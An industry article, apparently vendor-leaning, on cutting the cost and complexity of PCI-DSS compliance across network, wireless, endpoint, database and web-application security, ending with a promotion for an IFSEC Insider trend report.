We have witnessed in recent press the extraordinary lengths cybercriminal attacks can go to in order to breach target networks and steal valuable data for monetary or competitive gain. This phenomenon is particularly apparent in the world of electronic commerce, where full account details of credit card users are sold for a premium on the black market.
Fortunately, the principal stakeholders in the card payment ecosystem have defined a standard that has proven to be highly effective (albeit not infallible) at protecting data from such breaches. Over the past five years, the PCI-DSS framework has evolved from being guidelines without enforceable sanctions to a ‘must-have’ certification to remain in the business of manipulating, storing or transmitting cardholder data.
Despite its seemingly narrow focus on cardholder data protection, PCI-DSS spans most IT disciplines and skills, namely the network, database, web applications, file systems, encryption and core security-related processes, such as vulnerability and configuration management. As a result, the cost of implementing compliance has been alarmingly high, bringing into question the applicability of the standard in terms of risks versus costs.
Earlier this year, the Ponemon Institute conducted a study in the U.S. on the actual costs of compliance among 160 enterprises, including 46 international ones. The results of this study showed that, for mid-size organizations, the total cost of compliance with regulations such as PCI-DSS, SoX, HIPAA and others, would weigh-in at an average of $3.5 million, while the consequential cost of non-compliance was estimated at $9.4 million. While these figures illustrate a sizeable benefit for investment, the cost burden remains too great compared to the exposed risk for the majority of organizations where PCI-DSS is a requirement.
So, what strategies can be employed to reduce the complexities and costs of a PCI implementation? What are the principal concerns to consider in terms of PCI implementation?
PCI-DSS is multi-disciplinary and to fully comply with the standard, it is essential to take a global consolidated approach to address all 12 requirements as a whole before focusing on solving individual elements. The core IT disciplines to be considered are: Networking – Fixed; Networking – Wireless; Data and Databases; IT Assets/End-Points; and Web Applications.
Network – Fixed
The PCI core requirement covers controlled network segregation, inbound/outbound traffic flows and DMZ implementation. Specific functions include: real-time perimeter anti-virus, IPSec/VPN tunneling support, IDS/IPS, use of strong cryptography (SSL/IPSec), default ‘deny-all’ settings, support of digital certificates and two-factor user authentication, event monitoring, federated device management and reporting, and network vulnerability analysis support. These services cannot be provided by a legacy firewall, even a so-called next-generation firewall. The only way to cost effectively provide all these services and avoid the deployment of multiple devices is through the use of a Unified Threat Management (UTM) device. A UTM-based solution can help organizations cover all fixed network requirements of PCI while achieving greater overall PCI effectiveness and simultaneously minimizing implementation and operational costs.
Network – Wireless
In many ways, the wireless network is subject to the same constraints as the fixed network but it must also meet the following other key functions:
– Support for both ‘thick’ and ‘thin’ access points (AP) solutions that can work in a seamless management framework,
– Detection of rogue APs against a defined hardware inventory,
– Support and logging of wireless IDS/IPS,
– Support for WPA or WPA2 Enterprise mode with 802.1X authentication and AES encryption.
In practice, the best approach in larger deployments is to minimize the deployment of thick APs, which have wireless control/IPS, etc., built into the physical devices, and favour the deployment of thin APs access points, which are much easier to manage and maintain. Thin APs tunnel wireless traffic to wireless controllers, allowing significant economies of scale and a simplified security management capability through a ‘single pane of glass’ management console for increased visibility and policy enforcement.
IT Assets / Endpoints
IT assets include servers, desktops, laptops, operating systems, mobile devices and network equipment. The core objective is to ensure that all assets that constitute the PCI cardholder data environment are subject to the core security management processes.
Here, in order to have the most effective approach in meeting the PCI DSS requirements at minimal cost and complexity, it is important to consider the management of deployed endpoint security technologies and controls. The top 5 elements on the check list are:
– Support for asset vulnerability management to ensure that all operating systems are patched to the latest version and to assess configuration specific vulnerabilities;
– Configuration management capability against globally accepted best practices for operating system platform deployment (eg NIST, FDCC);
– Endpoint policy control to blacklist/whitelist software, processes, devices, drivers, access lists etc.;
– Automated remediation of configuration and audit issues for cost-effective operation;
– Deployment of client/mobile device anti-virus, preferably centrally administered.
Data & Databases
It is impossible to comply with PCI DSS without implementing a database security solution to protect against data loss or fraud. Whether due to an error or a deliberate intent to harm, data loss can have serious consequences. In order to meet PCI-DSS compliance, a database security solution must include:
– Database-specific vulnerability assessment and penetration testing;
– Configuration management for assessment against global best practices and/or the organisation’s own data security standards;
– Access control assessment both at the database and the application levels;
– Real-time monitoring of database users and their activity on both the database and critical cardholder data.
In order to simplify the creation and enforcement of data security policies that will help meet PCI-DSS compliance, it is important to look for a centrally-managed database security solution that provides all of the above features on one device. Enhanced solutions include features such as automatic database and sensitive data discovery. Further desirable functions include pre-built policies that cover standard industry and government requirements that when combined with a comprehensive set of graphical reports deliver out-of-the-box readiness and immediate value for PCI-DSS compliance.
Web Applications
As web applications are particularly exposed to the outside world, the PCI-DSS standard addresses them in detail in requirement 6.6. There are two methods that a company can apply in order to be in compliance with PCI DSS:
– Conduct yearly code reviews or
– Deploy a Web application firewall.
While code reviews/testing are essentially process in nature, a significant cost saving can be made through the implementation of a Web application firewall. The key functions that should be included in such a solution are:
– Support of OWASP Web security guidance, cross-site scripting (XSS) and cross site request forgery (CSRF) vulnerability protection;
– Support for DoS, buffer overflow type attacks at both the HTML and HTTP level;
– Access control and web application user authentication;
– Monitoring and management of error events;
– Incorporation of a web application vulnerability scanning capability for regular internal scans.
The multi-disciplinary nature of PCI-DSS creates complexity and, consequently, organizations have no choice but to deploy a combination of security devices to fully address the requirements of the standard. It is critical to take a consolidated approach in order to improve performance, security and reduce cost.
In fact, using a large range of solution vendors results in a wide array of disparate products and services introduced into the PCI solution, with the consequence of spiraling complexity (in terms of support, maintenance, resource training, etc.) and total cost of ownership. Minimizing the number of vendors to work with, to a single one if possible, is the only way to dramatically reduce Opex and Capex while removing complexity from implementation and management.
A common platform provided by a single vendor will also enable organizations to enhance their security posture, coverage and visibility for a lower overall risk of PCI project failure.
The physical access control market is moving fast. Find out where you stand with the latest edition of IFSEC Insider's comprehensive 2022 State of Physical Access Control trend report, covering all the latest developments within the market. We assess the current technology in use, upgrade plans and challenges, and major trends on the horizon after receiving the views of over 1000 security, facilities and IT professionals.
Get your copy for free today.
